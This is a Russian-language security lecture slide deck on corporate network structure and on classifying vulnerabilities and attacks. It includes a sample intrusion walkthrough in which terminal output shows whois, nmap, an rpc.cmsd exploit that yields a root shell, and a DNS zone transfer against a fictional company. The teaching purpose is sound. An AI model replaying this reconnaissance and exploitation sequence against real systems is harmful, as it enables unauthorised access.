Что такое findslide.org?

FindSlide.org - это сайт презентаций, докладов, шаблонов в формате PowerPoint.


Для правообладателей

Обратная связь

Email: Нажмите что бы посмотреть 

Яндекс.Метрика

Презентация на тему Типовая корпоративная сеть, понятие уязвимости и атаки

Содержание

Типовая корпоративная сетьВнутренние серверыРабочие местаМЭ
Типовая корпоративная сеть, понятие уязвимости  и атаки Раздел 1 – Тема 2 Типовая корпоративная сетьВнутренние серверыРабочие местаМЭ Уровни информационной инфраструктуры Уровни информационной инфраструктурыTCP/IPNetBEUIIPX/SPX Уровни информационной инфраструктуры Уровни информационной инфраструктуры Уровни информационной инфраструктурыOffice 2000 Уровни информационной инфраструктуры Классификация уязвимостей и атакРаздел 1 – Тема 3 Примерный сценарий атакиСбор информацииПолучение доступа к наименее защищённому узлу  (возможно с Этап сбора информации ACMETRADE.COM Registrant:Acmetrade.com, Inc. (ACMETRADE-DOM)  6600 Peachtree Dunwoody Road  Atlanta, GA 30338 [hacker@linux131 hacker]$ nmap 200.0.0.143Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )Interesting hacker:/export/home/hacker>./rpcscan dns.acmetrade.com cmsdScanning dns.acmetrade.com for program 100068cmsd is on port 33505hacker:/export/home/hacker> hacker:/export/home/hacker>iduid=1002(hacker) gid=10(staff)hacker:/export/home/hacker>uname -aSunOS evil.hacker.com 5.6 Generic_105181-05 sun4u sparc SUNW,UltraSPARC-IIi-Enginehacker:/export/home/hacker>./cmsd dns.acmetrade.comusing source port ##nslookupDefault Server: dns.acmetrade.comAddress: 208.21.2.67>>ls acmetrade.comReceived 15 records.^D[dns.acmetrade.com]www.acmetrade.com			208.21.2.10www1.acmetrade.com		208.21.2.12www2.acmetrade.com		208.21.2.103margin.acmetrade.com		208.21.4.10marketorder.acmetrade.com		208.21.2.62deriv.acmetrade.com		208.21.2.25deriv1.acmetrade.com		208.21.2.13bond.acmetrade.com		208.21.2.33ibd.acmetrade.com			208.21.2.27fideriv.acmetrade.com		208.21.4.42backoffice.acmetrade.com		208.21.4.45wiley.acmetrade.com		208.21.2.29bugs.acmetrade.com		208.21.2.89fw.acmetrade.com			208.21.2.94fw1.acmetrade.com			208.21.2.21Использование узла в качестве платформы для исследования других узлов сети (AcmeTrade’s Network)UNIXFirewallDNS ServerWeb ServerFiltering RouterNTClients & WorkstationsNetworkUNIXNTUNIXСхема сети Уязвимости и атаки Атака - действие нарушителя, которое приводит к реализации угрозы Классификация уязвимостей узлов, протоколов  и служб IP - сетей Классификация уязвимостей  по причинам возникновенияошибки проектирования  (технологий, протоколов, служб) Классификация по уровню  в информационной инфраструктуреУровень сетиУровень операционной системыУровень баз данныхУровень персоналаУровень приложений Высокий уровень рискаСредний уровень рискаНизкий уровень рискаКлассификация уязвимостей  по уровню (степени) Источники информации о новых уязвимостяхwww.cert.org    -   координационный www.iss.net/xforce Примеры уязвимостейУровень:  сетьСтепень риска:  средняяИсточник возникновения:  ошибки реализацииОписание: посылка Уровень:  ОССтепень риска:  высокаяИсточник возникновения:  ошибки реализацииОписание: проблема одной Уровень:  СУБДСтепень риска:  низкаяИсточник возникновения:  ошибки реализацииОписание: уязвимость в Уровень:  приложенияСтепень риска:  средняяИсточник возникновения:  ошибки реализацииОписание: посылка большого Уровень:  приложенияСтепень риска:  средняяИсточник возникновения:  ошибки реализацииОписание: OC Windows Уровень:  ПерсоналСтепень риска:  высокаяИсточник возникновения:  ошибки обслуживанияОписание: узел заражён http://cve.mitre.org/cveЕдиная система наименований для уязвимостейСтандартное описание для каждой уязвимостиОбеспечение совместимости баз данных уязвимостей http://cve.mitre.org/cveCAN-1999-0067CVE-1999-0067Кандидат CVEИндекс CVE Ситуация без CVEISS RealSecureCERT AdvisoryCisco DatabaseAxent NetReconland attack (spoofed SYN)Impossible IP PacketBugtragCA-97.28.Teardrop_LandLandNT4-SP3and Поддержка CVECVE-1999-0016 Land IP denial of serviceCVECERT AdvisoryBugtragISS RealSecureCisco DatabaseAxent NetRecon CVE entryCVE-1999-0005 Arbitrary command execution via IMAPbuffer overflow in authenticate command. Reference: Классификация атак в IP- сетях Классификация атак  по целям Нарушение нормального функционирования объекта атаки (отказ в Классификация атак  по местонахождению атакующего и объекта атакиАтакующий и объект атаки Классификация атак по механизмам реализацииПровоцирование отказа объекта (компонента)Подозрительная активность (разведка)Запуск кода (программы) Статистика по уязвимостям и атакамза 2000 годИсточник: Internet Security Systems Top 1010.	Переполнение буфера в Linux-приложениях 2.	Слабые пароли (системная политика) 3.	IIS (Microsoft Internet Top 1010.	Linux Buffer Overflows  2.	Weak Accounts  3.	IIS (Microsoft Internet Information Linux Buffer OverflowsWu-ftp BOIMAP BOQpopper BOOverwrite stackCommon script kiddie exploitsPoor coding standardsПереполнение 2.	Weak Accounts  3.	IIS (Microsoft Internet Information Server) 4.	Open Databases Уязвимости BINDBIND qinvCompile flag turned on by default, activated buffer-overflow, client request 2.	Weak Accounts  3.	IIS (Microsoft Internet Information Server) 4.	Open Databases RPC (Remote Procedure Calls)rpc.cmsd (sun-rpc.cmsd)rpc-statd (sun-rpc-statd)Sadmin (sol-sadmind-amslverify-bo)Amd (amd-bo)Mountd (linux-mountd-bo) 8.	RPC  9.	Bind 10.	Linux Buffer Overflows  7.	File Sharing  2.	Weak File SharingNetbios NFS Троянские кони+ + Rhosts для Unix - серверовПредоставление доступа к общим ресурсам 2.	Weak Accounts  3.	IIS (Microsoft Internet Information Server) 4.	Open Databases Электронная почтаSendmail Pipe Attack (smtp-pipe)Sendmail MIMEbo “root access” (sendmail-mime-bo2)Вирусы типа «ILOVEYOU» 2.	Weak Accounts  3.	IIS (Microsoft Internet Information Server) 4.	Open Databases E-business Web ApplicationsNetscapeGetBo (netscape-get-bo) “control server” HttpIndexserverPath (http-indexserver-path) “path info”Frontpage Extensions (frontpage-ext) 2.	Weak Accounts  3.	IIS (Microsoft Internet Information Server)  1.	Denial of Уязвимости СУБДOracle (пароли по умолчанию)Oracle setuid root oratclshSQL Server Xp_sprintf buffer overflowSQL Server Xp_cmdshell extended 4.	Open Databases  5.	E-Business Web Applications  6.	Open E-mail 7.	File Sharing IIS (Microsoft Internet Information Server)RDSHTRMalformed headerHtdig Remote Shell Execution PWS File AccessCGI 3.	IIS (Microsoft Internet Information Server) 4.	Open Databases  5.	E-Business Web Applications Слабые паролиБюджеты по умолчаниюRoutersServersОтсутствие пароляSNMP with public/private community strings set 2.	Weak Accounts  3.	IIS (Microsoft Internet Information Server) 4.	Open Databases Атаки «Denial of Service»TrinityTFNTFN2kTrin00StacheldrahtЗапуск в назначенное времяWindows platform (W9x/2K/NT)Настройка времени и целиРаспределённость 1.	Denial of Service Exploits  2.	Weak Accounts  3.	IIS (Microsoft Internet
Слайды презентации

Слайд 2 Типовая корпоративная сеть





Внутренние серверы
Рабочие места
МЭ

Типовая корпоративная сетьВнутренние серверыРабочие местаМЭ

Слайд 3 Уровни информационной инфраструктуры

Уровни информационной инфраструктуры

Слайд 4 Уровни информационной инфраструктуры


TCP/IP
NetBEUI
IPX/SPX

Уровни информационной инфраструктурыTCP/IPNetBEUIIPX/SPX

Слайд 5 Уровни информационной инфраструктуры



Уровни информационной инфраструктуры

Слайд 6 Уровни информационной инфраструктуры



Уровни информационной инфраструктуры

Слайд 7 Уровни информационной инфраструктуры



Office 2000

Уровни информационной инфраструктурыOffice 2000

Слайд 8 Уровни информационной инфраструктуры


Уровни информационной инфраструктуры

Слайд 9 Классификация уязвимостей и атак
Раздел 1 – Тема 3

Классификация уязвимостей и атакРаздел 1 – Тема 3

Слайд 10 Примерный сценарий атаки
Сбор информации
Получение доступа к наименее защищённому

Примерный сценарий атакиСбор информацииПолучение доступа к наименее защищённому узлу (возможно с

узлу (возможно с минимальными привилегиями)
Получение полного контроля над одним

из узлов или несколькими

Повышение уровня привилегий или использование узла в качестве платформы для исследования других узлов сети


Слайд 11 Этап сбора информации

Этап сбора информации

Слайд 13 ACMETRADE.COM

ACMETRADE.COM

Слайд 14 Registrant:
Acmetrade.com, Inc. (ACMETRADE-DOM)
6600 Peachtree Dunwoody Road

Registrant:Acmetrade.com, Inc. (ACMETRADE-DOM) 6600 Peachtree Dunwoody Road Atlanta, GA 30338 Domain

Atlanta, GA 30338

Domain Name: ACMETRADE.COM

Administrative Contact:
Vaughn, Danon (ES2394) dvaughn@ACMETRADE.COM
(678)443-6000 (FAX) (678) 443-6476
Technical Contact, Zone Contact:
Bergman, Bret (ET2324) bbergman@ACMETRADE.COM
(678)443-6100 (FAX) (678) 443-6208
Billing Contact:
Fields, Hope (ET3427) hfields@ACMETRADE.COM
(678)443-6101 (FAX) (678) 443-6401

Record Last updated on 27-Jul-99.
Record created on 06-Mar-98.
Database last updated on 4-Oct-99 09:09:01 EDT

Domain servers in listed order:

dns.acmetrade.com 208.21.2.67
www.acmetrade.com 208.21.2.10
www1.acmetrade.com 208.21.2.12
www2.acmetrade.com 208.21.2.103

http://www.networksolutions.com/cgi-bin/whois/whois/?STRING=acmetrade.com



Слайд 18 [hacker@linux131 hacker]$ nmap 200.0.0.143

Starting nmap V. 2.53 by

[hacker@linux131 hacker]$ nmap 200.0.0.143Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/

fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on (200.0.0.143):
(The 1516 ports

scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http
135/tcp open loc-srv
139/tcp open netbios-ssn
443/tcp open https
465/tcp open smtps

Nmap run completed -- 1 IP address (1 host up) scanned in 1 second
[hacker@linux131 hacker]$

Слайд 19
hacker:/export/home/hacker>
./rpcscan dns.acmetrade.com cmsd
Scanning dns.acmetrade.com for program 100068
cmsd is

hacker:/export/home/hacker>./rpcscan dns.acmetrade.com cmsdScanning dns.acmetrade.com for program 100068cmsd is on port 33505hacker:/export/home/hacker>

on port 33505
hacker:/export/home/hacker>


Слайд 22
hacker:/export/home/hacker>
id
uid=1002(hacker) gid=10(staff)
hacker:/export/home/hacker>
uname -a
SunOS evil.hacker.com 5.6 Generic_105181-05 sun4u sparc

hacker:/export/home/hacker>iduid=1002(hacker) gid=10(staff)hacker:/export/home/hacker>uname -aSunOS evil.hacker.com 5.6 Generic_105181-05 sun4u sparc SUNW,UltraSPARC-IIi-Enginehacker:/export/home/hacker>./cmsd dns.acmetrade.comusing source

SUNW,UltraSPARC-IIi-Engine
hacker:/export/home/hacker>
./cmsd dns.acmetrade.com
using source port 53
rtable_create worked
Exploit successful. Portshell created

on port 33505

hacker:/export/home/hacker>

Trying 208.21.2.67...
Connected to dns.acmetrade.com.
Escape character is '^]'.

#

id

uid=0(root) gid=0(root)

#

uname -a

SunOS dns 5.5.1 Generic_103640-24 sun4m sparc SUNW,SPARCstation-5

#

telnet dns.acmetrade.com 33505

Этап получения доступа к узлу


Слайд 23
#
#
nslookup
Default Server: dns.acmetrade.com
Address: 208.21.2.67
>
>
ls acmetrade.com
Received 15 records.
^D
[dns.acmetrade.com]
www.acmetrade.com 208.21.2.10
www1.acmetrade.com 208.21.2.12
www2.acmetrade.com 208.21.2.103
margin.acmetrade.com 208.21.4.10
marketorder.acmetrade.com 208.21.2.62
deriv.acmetrade.com 208.21.2.25
deriv1.acmetrade.com 208.21.2.13
bond.acmetrade.com 208.21.2.33
ibd.acmetrade.com 208.21.2.27
fideriv.acmetrade.com 208.21.4.42
backoffice.acmetrade.com 208.21.4.45
wiley.acmetrade.com 208.21.2.29
bugs.acmetrade.com 208.21.2.89
fw.acmetrade.com 208.21.2.94
fw1.acmetrade.com 208.21.2.21
Использование узла

##nslookupDefault Server: dns.acmetrade.comAddress: 208.21.2.67>>ls acmetrade.comReceived 15 records.^D[dns.acmetrade.com]www.acmetrade.com			208.21.2.10www1.acmetrade.com		208.21.2.12www2.acmetrade.com		208.21.2.103margin.acmetrade.com		208.21.4.10marketorder.acmetrade.com		208.21.2.62deriv.acmetrade.com		208.21.2.25deriv1.acmetrade.com		208.21.2.13bond.acmetrade.com		208.21.2.33ibd.acmetrade.com			208.21.2.27fideriv.acmetrade.com		208.21.4.42backoffice.acmetrade.com		208.21.4.45wiley.acmetrade.com		208.21.2.29bugs.acmetrade.com		208.21.2.89fw.acmetrade.com			208.21.2.94fw1.acmetrade.com			208.21.2.21Использование узла в качестве платформы для исследования других узлов сети

в качестве платформы для исследования других узлов сети


Слайд 24 (AcmeTrade’s Network)
UNIX
Firewall
DNS Server
Web Server
Filtering Router
NT
Clients & Workstations
Network
UNIX
NT
UNIX
Схема сети

(AcmeTrade’s Network)UNIXFirewallDNS ServerWeb ServerFiltering RouterNTClients & WorkstationsNetworkUNIXNTUNIXСхема сети

Слайд 25 Уязвимости и атаки

Атака - действие нарушителя, которое

Уязвимости и атаки Атака - действие нарушителя, которое приводит к реализации

приводит к реализации угрозы путем использования уязвимостей информационной системы.
Уязвимость

- любая характеристика или свойство информационной системы, использование которой нарушителем может привести к реализации угрозы.



Слайд 26 Классификация уязвимостей
узлов, протоколов и служб IP - сетей

Классификация уязвимостей узлов, протоколов и служб IP - сетей

Слайд 27 Классификация уязвимостей по причинам возникновения
ошибки проектирования (технологий, протоколов,

Классификация уязвимостей по причинам возникновенияошибки проектирования (технологий, протоколов, служб) ошибки реализации

служб)
ошибки реализации (программ)
ошибки эксплуатации (неправильная настройка, неиспользуемые сетевые службы, слабые

пароли)

Слайд 28 Классификация по уровню в информационной инфраструктуре
Уровень сети
Уровень операционной

Классификация по уровню в информационной инфраструктуреУровень сетиУровень операционной системыУровень баз данныхУровень персоналаУровень приложений

системы
Уровень баз данных
Уровень персонала
Уровень приложений


Слайд 29 Высокий уровень риска
Средний уровень риска
Низкий уровень риска
Классификация уязвимостей

Высокий уровень рискаСредний уровень рискаНизкий уровень рискаКлассификация уязвимостей по уровню (степени)

по уровню (степени) риска
Уязвимости, позволяющие атакующему получить непосредственный доступ

у узлу с правами суперпользователя

Уязвимости, позволяющие атакующему получить доступ к информации, которая с высокой степенью вероятности позволит в последствии получить доступ к узлу

Уязвимости, позволяющие злоумышленнику осуществлять сбор критичной информации о системе






Слайд 30 Источники информации
о новых уязвимостях
www.cert.org

Источники информации о новых уязвимостяхwww.cert.org  -  координационный центр 					CERT/CC

- координационный центр CERT/CC
www.iss.net/xforce -

база данных компании ISS

llnl.ciac.gov - центр CIAC

www.cert.ru - российский CERT/CC

www.securityfocus.com


Слайд 31 www.iss.net/xforce

www.iss.net/xforce

Слайд 32 Примеры уязвимостей
Уровень: сеть
Степень риска: средняя
Источник возникновения:

Примеры уязвимостейУровень: сетьСтепень риска: средняяИсточник возникновения: ошибки реализацииОписание: посылка большого числа

ошибки реализации
Описание: посылка большого числа одинаковых фрагментов IP-датаграммы

приводит к недоступности узла на время атаки

Слайд 33 Уровень: ОС
Степень риска: высокая
Источник возникновения:

Уровень: ОССтепень риска: высокаяИсточник возникновения: ошибки реализацииОписание: проблема одной из функций

ошибки реализации
Описание: проблема одной из функций ядра ОС Windows

NT, позволяющая злоумышленнику получить привилегии администратора

Примеры уязвимостей


Слайд 34 Уровень: СУБД
Степень риска: низкая
Источник возникновения:

Уровень: СУБДСтепень риска: низкаяИсточник возникновения: ошибки реализацииОписание: уязвимость в реализации возможности

ошибки реализации
Описание: уязвимость в реализации возможности подключения со стороны

других SQL-серверов

Примеры уязвимостей


Слайд 35 Уровень: приложения
Степень риска: средняя
Источник возникновения:

Уровень: приложенияСтепень риска: средняяИсточник возникновения: ошибки реализацииОписание: посылка большого числа некорректно

ошибки реализации
Описание: посылка большого числа некорректно построенных запросов приводит

к повышенному расходу ресурсов процессора

Примеры уязвимостей


Слайд 36 Уровень: приложения
Степень риска: средняя
Источник возникновения:

Уровень: приложенияСтепень риска: средняяИсточник возникновения: ошибки реализацииОписание: OC Windows 2000 и

ошибки реализации
Описание: OC Windows 2000 и Windows 98 уязвимы

к атаке «отказ в обслуживании», вызываемой исчерпанием всех UDP-сокетов

Примеры уязвимостей


Слайд 37 Уровень: Персонал
Степень риска: высокая
Источник возникновения:

Уровень: ПерсоналСтепень риска: высокаяИсточник возникновения: ошибки обслуживанияОписание: узел заражён серверной частью

ошибки обслуживания
Описание: узел заражён серверной частью троянского коня, позволяющей

установить полный контроль над узлом

Примеры уязвимостей


Слайд 38 http://cve.mitre.org/cve
Единая система наименований для уязвимостей
Стандартное описание для каждой

http://cve.mitre.org/cveЕдиная система наименований для уязвимостейСтандартное описание для каждой уязвимостиОбеспечение совместимости баз данных уязвимостей

уязвимости
Обеспечение совместимости баз данных уязвимостей


Слайд 39 http://cve.mitre.org/cve
CAN-1999-0067

CVE-1999-0067
Кандидат CVE
Индекс CVE


http://cve.mitre.org/cveCAN-1999-0067CVE-1999-0067Кандидат CVEИндекс CVE

Слайд 40 Ситуация без CVE
ISS RealSecure
CERT Advisory
Cisco Database
Axent NetRecon
land attack

Ситуация без CVEISS RealSecureCERT AdvisoryCisco DatabaseAxent NetReconland attack (spoofed SYN)Impossible IP

(spoofed SYN)


Impossible IP Packet
Bugtrag
CA-97.28.Teardrop_Land
Land
NT4-SP3and 95 [latierra.c]



Уязвимость Land IP denial

of service

Слайд 41 Поддержка CVE
CVE-1999-0016 Land IP denial of service
CVE
CERT Advisory
Bugtrag


ISS

Поддержка CVECVE-1999-0016 Land IP denial of serviceCVECERT AdvisoryBugtragISS RealSecureCisco DatabaseAxent NetRecon

RealSecure
Cisco Database
Axent NetRecon




Слайд 42 CVE entry
CVE-1999-0005

Arbitrary command execution via IMAP
buffer overflow

CVE entryCVE-1999-0005 Arbitrary command execution via IMAPbuffer overflow in authenticate command.

in authenticate command.

Reference: CERT:CA-98.09.imapd
Reference: SUN:00177
Reference: BID:130


Reference: XF:imap-authenticate-bo

Номер

Описание

Ссылки


Слайд 43
Классификация атак в IP- сетях

Классификация атак в IP- сетях

Слайд 44 Классификация атак по целям
Нарушение нормального функционирования
объекта

Классификация атак по целям Нарушение нормального функционирования объекта атаки (отказ в

атаки (отказ в обслуживании)
Получение конфиденциальной информации
Модификация или

фальсификация
критичных данных

Получение полного контроля над
объектом атаки


Слайд 45 Классификация атак по местонахождению атакующего и объекта атаки
Атакующий

Классификация атак по местонахождению атакующего и объекта атакиАтакующий и объект атаки

и объект атаки находятся в одном сегменте
Атакующий и объект

атаки находятся в разных сегментах

Маршру-тизатор


Слайд 46 Классификация атак по механизмам реализации
Провоцирование отказа объекта (компонента)
Подозрительная

Классификация атак по механизмам реализацииПровоцирование отказа объекта (компонента)Подозрительная активность (разведка)Запуск кода

активность (разведка)
Запуск кода (программы) на объекте атаки
Бесполезное расходование вычислительных

ресурсов (перегрузка)

Нарушение навигации (ложный маршрут)

Пассивное прослушивание


Слайд 47 Статистика по уязвимостям
и атакам
за 2000 год
Источник: Internet

Статистика по уязвимостям и атакамза 2000 годИсточник: Internet Security Systems

Security Systems


Слайд 48 Top 10
10. Переполнение буфера в Linux-приложениях
2. Слабые пароли (системная

Top 1010.	Переполнение буфера в Linux-приложениях 2.	Слабые пароли (системная политика) 3.	IIS (Microsoft

политика)
3. IIS (Microsoft Internet Information Server)
4. Уязвимости СУБД
5. Уязвимости

Web-приложений

6. Электронная почта

7. Разграничение доступа к общим ресурсам

8. RPC (удаленные процедуры)

9. Bind

1. Выведение из строя («Denial of Service»)


Слайд 49 Top 10
10. Linux Buffer Overflows
2. Weak Accounts

Top 1010.	Linux Buffer Overflows 2.	Weak Accounts 3.	IIS (Microsoft Internet Information Server)

3. IIS (Microsoft Internet Information Server)
4. Open Databases
5. E-Business

Web Applications

6. Open Sendmail

7. File Sharing

8. RPC

9. Bind

1. Denial of Service Exploits


Слайд 50 Linux Buffer Overflows
Wu-ftp BO
IMAP BO
Qpopper BO
Overwrite stack
Common script

Linux Buffer OverflowsWu-ftp BOIMAP BOQpopper BOOverwrite stackCommon script kiddie exploitsPoor coding

kiddie exploits
Poor coding standards
Переполнение буфера в Linux - приложениях


Слайд 51 2. Weak Accounts
3. IIS (Microsoft Internet Information

2.	Weak Accounts 3.	IIS (Microsoft Internet Information Server) 4.	Open Databases 5.	E-Business

Server)
4. Open Databases
5. E-Business Web Applications
6. Open

Sendmail

7. File Sharing

8. RPC

1. Denial of Service Exploits

10. Linux Buffer Overflows

9. Bind

Top 10


Слайд 52 Уязвимости BIND
BIND qinv
Compile flag turned on by default,

Уязвимости BINDBIND qinvCompile flag turned on by default, activated buffer-overflow, client

activated buffer-overflow, client request to server, script kiddie
BIND

nxt
Server to server response, buffer handling overflowable, more advanced

Слайд 53 2. Weak Accounts
3. IIS (Microsoft Internet Information

2.	Weak Accounts 3.	IIS (Microsoft Internet Information Server) 4.	Open Databases 5.	E-Business

Server)
4. Open Databases
5. E-Business Web Applications
6. Open

Sendmail

7. File Sharing

1. Denial of Service Exploits

9. Bind

10. Linux Buffer Overflows

8. RPC (Remote Procedure Calls)

Top 10


Слайд 54 RPC (Remote Procedure Calls)
rpc.cmsd (sun-rpc.cmsd)
rpc-statd (sun-rpc-statd)
Sadmin (sol-sadmind-amslverify-bo)
Amd (amd-bo)
Mountd

RPC (Remote Procedure Calls)rpc.cmsd (sun-rpc.cmsd)rpc-statd (sun-rpc-statd)Sadmin (sol-sadmind-amslverify-bo)Amd (amd-bo)Mountd (linux-mountd-bo)

(linux-mountd-bo)


Слайд 55 8. RPC
9. Bind
10. Linux Buffer Overflows

8.	RPC 9.	Bind 10.	Linux Buffer Overflows 7.	File Sharing 2.	Weak Accounts 3.	IIS

7. File Sharing
2. Weak Accounts
3. IIS (Microsoft Internet

Information Server)

4. Open Databases

5. E-Business Web Applications

6. Open Sendmail

1. Denial of Service Exploits

Top 10


Слайд 56 File Sharing
Netbios
NFS
Троянские кони
+ + Rhosts для

File SharingNetbios NFS Троянские кони+ + Rhosts для Unix - серверовПредоставление доступа к общим ресурсам

Unix - серверов
Предоставление доступа к общим ресурсам


Слайд 57 2. Weak Accounts
3. IIS (Microsoft Internet Information

2.	Weak Accounts 3.	IIS (Microsoft Internet Information Server) 4.	Open Databases 5.	E-Business

Server)
4. Open Databases
5. E-Business Web Applications

1. Denial of Service Exploits

7. File Sharing

8. RPC

9. Bind

10. Linux Buffer Overflows

6. Open E-mail (электронная почта)

Top 10


Слайд 58 Электронная почта
Sendmail Pipe Attack (smtp-pipe)
Sendmail MIMEbo “root access” (sendmail-mime-bo2)
Вирусы

Электронная почтаSendmail Pipe Attack (smtp-pipe)Sendmail MIMEbo “root access” (sendmail-mime-bo2)Вирусы типа «ILOVEYOU»

типа «ILOVEYOU»


Слайд 59 2. Weak Accounts
3. IIS (Microsoft Internet Information

2.	Weak Accounts 3.	IIS (Microsoft Internet Information Server) 4.	Open Databases

Server)
4. Open Databases
1. Denial of Service Exploits


6. Open E-mail

7. File Sharing

8. RPC

9. Bind

10. Linux Buffer Overflows

5. E-Business Web Applications

Top 10


Слайд 60 E-business Web Applications
NetscapeGetBo (netscape-get-bo) “control server”
HttpIndexserverPath (http-indexserver-path)

E-business Web ApplicationsNetscapeGetBo (netscape-get-bo) “control server” HttpIndexserverPath (http-indexserver-path) “path info”Frontpage Extensions

“path info”
Frontpage Extensions (frontpage-ext) “readable passwords”
FrontpagePwdAdministrators
(frontpage-pwd-administrators) “reveal

pwd”

Слайд 61 2. Weak Accounts
3. IIS (Microsoft Internet Information

2.	Weak Accounts 3.	IIS (Microsoft Internet Information Server) 1.	Denial of Service

Server)
1. Denial of Service Exploits
5. E-Business Web

Applications

6. Open E-mail

7. File Sharing

8. RPC

9. Bind

10. Linux Buffer Overflows

4. Open Databases

Top 10


Слайд 62 Уязвимости СУБД
Oracle (пароли по умолчанию)
Oracle setuid root oratclsh
SQL

Уязвимости СУБДOracle (пароли по умолчанию)Oracle setuid root oratclshSQL Server Xp_sprintf buffer overflowSQL Server Xp_cmdshell extended

Server Xp_sprintf buffer overflow
SQL Server Xp_cmdshell extended


Слайд 63 4. Open Databases
5. E-Business Web Applications

4.	Open Databases 5.	E-Business Web Applications 6.	Open E-mail 7.	File Sharing 8.	RPC

6. Open E-mail
7. File Sharing
8. RPC
9. Bind
10. Linux

Buffer Overflows

3. IIS (Microsoft Internet Information Server)

2. Weak Accounts

1. Denial of Service Exploits

Top 10


Слайд 64 IIS (Microsoft Internet Information Server)
RDS
HTR
Malformed header
Htdig Remote Shell

IIS (Microsoft Internet Information Server)RDSHTRMalformed headerHtdig Remote Shell Execution PWS File

Execution
PWS File Access
CGI Lasso “read arbitrary files”
PHP3

safe mode metachar remote execution
PHP mlog.html read files


Слайд 65 3. IIS (Microsoft Internet Information Server)
4. Open Databases

3.	IIS (Microsoft Internet Information Server) 4.	Open Databases 5.	E-Business Web Applications


5. E-Business Web Applications
6. Open E-mail
7. File Sharing


8. RPC

9. Bind

10. Linux Buffer Overflows

2. Weak Accounts (слабые пароли)

1. Denial of Service Exploits

Top 10


Слайд 66 Слабые пароли
Бюджеты по умолчанию
Routers
Servers
Отсутствие пароля
SNMP with public/private community

Слабые паролиБюджеты по умолчаниюRoutersServersОтсутствие пароляSNMP with public/private community strings set

strings set


Слайд 67 2. Weak Accounts
3. IIS (Microsoft Internet Information

2.	Weak Accounts 3.	IIS (Microsoft Internet Information Server) 4.	Open Databases 5.	E-Business

Server)
4. Open Databases
5. E-Business Web Applications
6. Open

E-mail

7. File Sharing

8. RPC

9. Bind

10. Linux Buffer Overflows

1. Denial of Service Exploits

Top 10


Слайд 68 Атаки «Denial of Service»
Trinity
TFN
TFN2k
Trin00
Stacheldraht
Запуск в назначенное время
Windows platform

Атаки «Denial of Service»TrinityTFNTFN2kTrin00StacheldrahtЗапуск в назначенное времяWindows platform (W9x/2K/NT)Настройка времени и целиРаспределённость

(W9x/2K/NT)
Настройка времени и цели
Распределённость


  • Имя файла: tipovaya-korporativnaya-set-ponyatie-uyazvimosti-i-ataki.pptx
  • Количество просмотров: 156
  • Количество скачиваний: 0